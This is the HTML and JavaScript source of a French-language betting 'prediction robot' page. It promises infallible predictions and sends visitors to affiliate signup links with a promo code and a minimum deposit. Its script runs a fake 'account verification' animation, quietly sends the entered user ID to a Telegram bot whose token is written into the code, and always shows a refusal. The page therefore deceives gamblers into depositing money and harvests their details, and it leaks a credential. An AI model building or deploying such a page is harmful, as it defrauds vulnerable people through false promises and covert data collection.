<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>BET6VIP</title>
    <link rel="stylesheet" href="style.css" />
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600;700&display=swap" rel="stylesheet" />
</head>
<body>
    <div class="container">
        <header>
            <h1 class="title">ROBOT DE PREDICTION PARIS SPORTIF</h1>
            <!--
            <p class="subtitle">
                <span class="promo-highlight">BET6VIP</span> –
                Je suis ton robot de prédiction qui analyse des milliers de données pour te fournir les meilleurs prédictions
            </p>
            -->
        </header>

        <div class="intro-text">
            <p class="highlight-text">ES-TU PRÊT À DEVENIR RICHE GRÂCE À MES PRÉDICTIONS INFAILLIBLES?</p>
            <p class="desc-text">Choisis un site ci-dessous, crée ton compte avec le code promo:  <span class="promo-highlight">BET6VIP</span> et dépose minimum +20 000 FCFA / 30$. Saisis ton ID, attends la validation, et laisse-toi emporter par une avalanche de prédictions automatiques qui boosteront tes mises vers le succès !</p>
        </div>

        <div class="betting-links">
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://refpa3219049.top/L?tag=d_2310901m_1599c_&site=2310901&ad=1599', '1xbet.png')">
                <img src="1xbet.png" alt="1xBet" class="btn-icon">
                <span>1xBet</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://1weyd.com/', '1win.jpeg')">
                <img src="1win.jpeg" alt="1Win" class="btn-icon">
                <span>1Win</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://bwredir.com/21uE', 'betwinner.png')">
                <img src="betwinner.png" alt="BetWinner" class="btn-icon">
                <span>BetWinner</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://refpaikgai.top/L?tag=d_4115421m_2170c_&site=4115421&ad=2170', 'melbet.jpeg')">
                <img src="melbet.jpeg" alt="MelBet" class="btn-icon">
                <span>MelBet</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://lb-aff.com/L?tag=d_4111851m_22611c_site&site=4111851&ad=22611&r=registration', 'linebet.png')">
                <img src="linebet.png" alt="LineBet" class="btn-icon">
                <span>LineBet</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://bonusweb.org/L?tag=d_3506686m_37513c_&site=3506686&ad=37513', '888starz.jpeg')">
                <img src="888starz.jpeg" alt="888Starz" class="btn-icon">
                <span>888STARZ</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://refpaiozdg.top/L?tag=d_3506834m_71269c_&site=3506834&ad=71269&r=registration', 'megapari.png')">
                <img src="megapari.png" alt="Megapari" class="btn-icon">
                <span>Megapari</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://combodef.com/L?tag=d_4108269m_60651c_&site=4108269&ad=60651', 'paripesa.png')">
                <img src="paripesa.png" alt="PariPesa" class="btn-icon">
                <span>PariPesa</span>
            </div>
            <div class="betting-btn" onclick="showPopup('FREEDGUY', 'https://refpa196654.top/L?tag=d_4109014m_94904c_&site=4109014&ad=94904', 'winwin.jpg')">
                <img src="winwin.jpg" alt="WinWin" class="btn-icon">
                <span>WinWin</span>
            </div>
        </div>

        <div class="bot-message">
            <img src="IMG_8038.jpeg" alt="Bot Icon" class="bot-icon" />
            <p>“Je suis ton robot ultra-performant, transformant chaque jour les mises de milliers de parieurs en bénéfice . Rejoins moi vite et révolutionne tes paris!”</p>
        </div>

        <div class="closing-text">
            <p class="highlight-text">CONDITIONS D’ADHÉSION</p>
            <p class="desc-text">Seuls les comptes créés avec le code promo BET6VIP et disposant d’un solde minimum de 20 000 FCFA / 30$ seront acceptés.</p>
        </div>

        <div class="luxury-animation">
            <div class="coin"></div>
            <div class="coin"></div>
            <div class="coin"></div>
            <div class="sparkle"></div>
            <div class="sparkle"></div>
            <div class="pulse-ring"></div>
            <div class="pulse-ring"></div>
        </div>

        <!-- Popup 1: Registration -->
        <div id="registerPopup" class="popup">
            <div class="popup-content">
                <img id="popupLogo" src="" alt="Betting Site Logo" class="popup-logo">
                <h2>INSCRIT - TOI</h2>
                <p><b>Link:</b> <a href="" id="popupLink" target="_blank"></a></p>
                <p><b>Promo Code:</b> <span id="popupCode"></span></p>
                <button onclick="showUserIdPopup()">JE ME SUIS INSCRIT</button>
                <button onclick="closePopup('registerPopup')">FERME</button>
            </div>
        </div>

        <!-- Popup 2: User ID Submission -->
        <div id="userIdPopup" class="popup">
            <div class="popup-content reassurance">
                <h2>VÉRIFICATION POUR ACCÉDER AUX PRÉDICTIONS</h2>
                <p class="reassurance-text">
                    Seuls les comptes BET6VIP avec 20 000 FCFA min sont acceptés. Si éligible, entrez votre ID. Profitez de prédictions exclusives!
                </p>
                <div class="sports-images">
                    <img src="games1.jpg" alt="Football" class="sport-img">
                    <img src="games2.jpg" alt="Basketball" class="sport-img">
                </div>
                <input type="text" id="userIdInput" placeholder="ENTRER VOTRE ID">
                <button onclick="submitUserId()">PREDICTIONS</button>
                <button onclick="closePopup('userIdPopup')">Cancel</button>
            </div>
        </div>

        <!-- Popup 3: Loading/Analyzing -->
        <div id="loadingPopup" class="popup">
            <div class="popup-content loading">
                <h2>ANALYSE DE VOTRE COMPTE ....</h2>
                <div class="hacker-loader">
                    <div class="loader-bar"></div>
                    <div class="loader-bar"></div>
                    <div class="loader-bar"></div>
                </div>
                <p class="loading-text">Verification du code promo et du solde de votre compte en cours...</p>
            </div>
        </div>

        <!-- Popup 4: Decline Message -->
        <div id="declinePopup" class="popup">
            <div class="popup-content">
                <h2>❌ACCÈS REFUSÉ – COMPTE NON ÉLIGIBLE</h2>
                <p>Votre compte ne remplit pas les critères requis pour accéder aux prédictions. Cela peut être dû aux raisons suivantes:</p>
                <ul class="decline-reasons">
                    <li>
                        Votre compte n’a pas été créé avec le code promo 
                        <span class="promo-highlight">BET6VIP</span>
                    </li>
                    <li>
                        Votre solde est inférieur à 20 000 FCFA / 30$.
                    </li>
                </ul>
                <p>
                    Veuillez vérifier vos informations et réessayer .
                </p>
                <button onclick="closePopup('declinePopup')">RÉESSAYE!</button>
            </div>
        </div>
    </div>

    <script>
        function extractURL(text) {
            const regex = /(https?:\/\/[a-zA-Z0-9.-]+\.[a-zA-Z]{2,})/;
            const match = text.match(regex);
            return match ? match[0] : null;
          }

        function showPopup(referCode, link, logo) {
            document.getElementById("popupLogo").src = logo;
            document.getElementById("popupLink").textContent = extractURL(link);
            document.getElementById("popupLink").href = link;
            document.getElementById("popupCode").textContent = "BET6VIP";
            document.getElementById("registerPopup").style.display = "flex";
        }

        function closePopup(popupId) {
            document.getElementById(popupId).style.display = "none";
        }

        function showUserIdPopup() {
            closePopup("registerPopup");
            document.getElementById("userIdPopup").style.display = "flex";
        }

        function submitUserId() {
            const userId = document.getElementById("userIdInput").value;
            if (userId) {
                closePopup("userIdPopup");
                document.getElementById("loadingPopup").style.display = "flex";

                setTimeout(() => {
                    closePopup("loadingPopup");

                        sendToTelegram(userId);
                        document.getElementById("declinePopup").style.display = "flex";
                    
                }, 3000);
            } else {
                alert("Please enter your User ID");
            }
        }

        function sendToTelegram(userId) {
            const botToken = "7837408705:AAG57fZIxsS1jrqq57vTvEYaGED2ls75Eb4";
            const chatId = "5029593137";
            const message = `New Registration:\n\nSite: ${document.getElementById("popupLink").textContent}\nUser ID: ${userId}\nReferral Code: ${document.getElementById("popupCode").textContent}`;

            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                    disable_web_page_preview: true,
                }),
            })/*
            .then(response => response.json())
            .then(data => {
                if (!data.ok) console.error("Telegram error:", data);
            })
            .catch(error => console.error("Fetch error:", error));
            */
        }
    </script>
</body>
</html>
